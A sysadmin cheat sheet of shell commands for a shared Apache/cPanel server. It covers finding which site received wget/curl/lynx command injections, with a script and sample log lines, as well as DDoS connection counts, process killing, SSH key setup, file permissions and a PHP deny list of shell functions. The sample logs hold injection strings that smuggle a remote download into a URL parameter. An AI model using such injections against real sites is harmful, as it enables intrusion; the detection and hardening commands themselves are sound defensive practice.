The following command should aid you in isolating which
site was responsible for this injection:
find /usr/local/apache/domlogs/ -type f -exec egrep -H '(wget|curl|lynx)%20' {} \;
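Added example (not part of the original notes): the command above prints every matching log line, while this script groups the matches per site and client IP so the responsible site stands out. It assumes one combined-format access log per site, with the file name being the site; the function names injection_hits and make_sample_logs and the sample log lines are constructed for illustration.

```sh
#!/bin/sh
# Added example: rank sites and client IPs by hits on the pattern above.
# Assumption: one access log per site under the directory (file name = site),
# combined log format (client IP is the first field), no ':' in the log path.

PATTERN='(wget|curl|lynx)%20'   # tool name followed by a URL-encoded space

# injection_hits DIR -> "count site client_ip" lines, highest count first
injection_hits() {
    find "$1" -type f -exec grep -EH "$PATTERN" {} + 2>/dev/null |
    awk '{
        i = index($0, ":")                    # grep -H prints "path:logline"
        n = split(substr($0, 1, i - 1), p, "/")
        split(substr($0, i + 1), f, " ")      # f[1] = client IP (v4 or v6)
        count[p[n] " " f[1]]++                # p[n] = log file name = site
    }
    END { for (k in count) print count[k], k }' |
    sort -k1,1nr -k2
}

# Constructed sample logs (documentation addresses and domains only)
make_sample_logs() {
    mkdir -p "$1"
    cat > "$1/shop.example.com" <<'EOF'
203.0.113.7 - - [10/Oct/2010:13:55:36 +0000] "GET /view.php?f=a;wget%20http://files.example.invalid/a HTTP/1.1" 200 90
203.0.113.7 - - [10/Oct/2010:13:56:02 +0000] "GET /view.php?f=a;curl%20-O%20http://files.example.invalid/a HTTP/1.1" 200 90
192.0.2.10 - - [10/Oct/2010:13:57:40 +0000] "GET /index.php HTTP/1.1" 200 5120
EOF
    cat > "$1/blog.example.org" <<'EOF'
2001:db8::5 - - [10/Oct/2010:14:01:11 +0000] "GET /p.php?c=lynx%20-dump%20http://files.example.invalid/b HTTP/1.1" 404 210
192.0.2.44 - - [10/Oct/2010:14:02:30 +0000] "GET /wget-howto.html HTTP/1.1" 200 2048
EOF
}

# Demo run on the constructed logs
tmp=$(mktemp -d) && make_sample_logs "$tmp" && injection_hits "$tmp"
rm -rf "$tmp"
```

On a real server, call injection_hits /usr/local/apache/domlogs/ instead of the demo directory.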
========================================================
A quick and useful command for checking if a server is under DDoS is:
netstat -anp | grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
lynx -dump http://127.0.0.1/whm-server-status
The netstat pipeline lists the IPs holding the most connections to the server (highest counts last); the lynx command dumps the Apache status page.
=========================================================
Forwarding through index page:
==========================================================
To kill perl processes:
ps auxww | grep '[p]erl' | awk '{print $2}' | xargs kill -9
===========================================================
ssh root@192.168.0.12 'mkdir ~/.koithar;echo '`cat ~/.ssh/id_dsa.pub`' >> ~/.koithar/authorized_keys'
grep -lir "some text" *    # to find a text in a file
=========================================================
find . -name "*.php" -exec chmod 644 {} \;
find . -name "config*.php" -exec chmod a-w {} \;
find . -name "*" -type d -exec chmod 755 {} \;
find . -name "images" -type d -exec chmod a+rxw {} \;
find . -name "thumbnails" -type d -exec chmod a+rxw {} \;
=========================================================
disable_functions = system,system_exec,shell,shell_exec,exec,passthru,escapeshellarg,escapeshellcmd,proc_close,proc_open,ini_alter,dl,popen,parse_ini_file,show_source
=========================================================
rpm -qa | grep -i 'yp-tools\|ypbind\|ypserv\|redhat-config\|samba\|cups\|electric\|doxyge\|gmp-dev'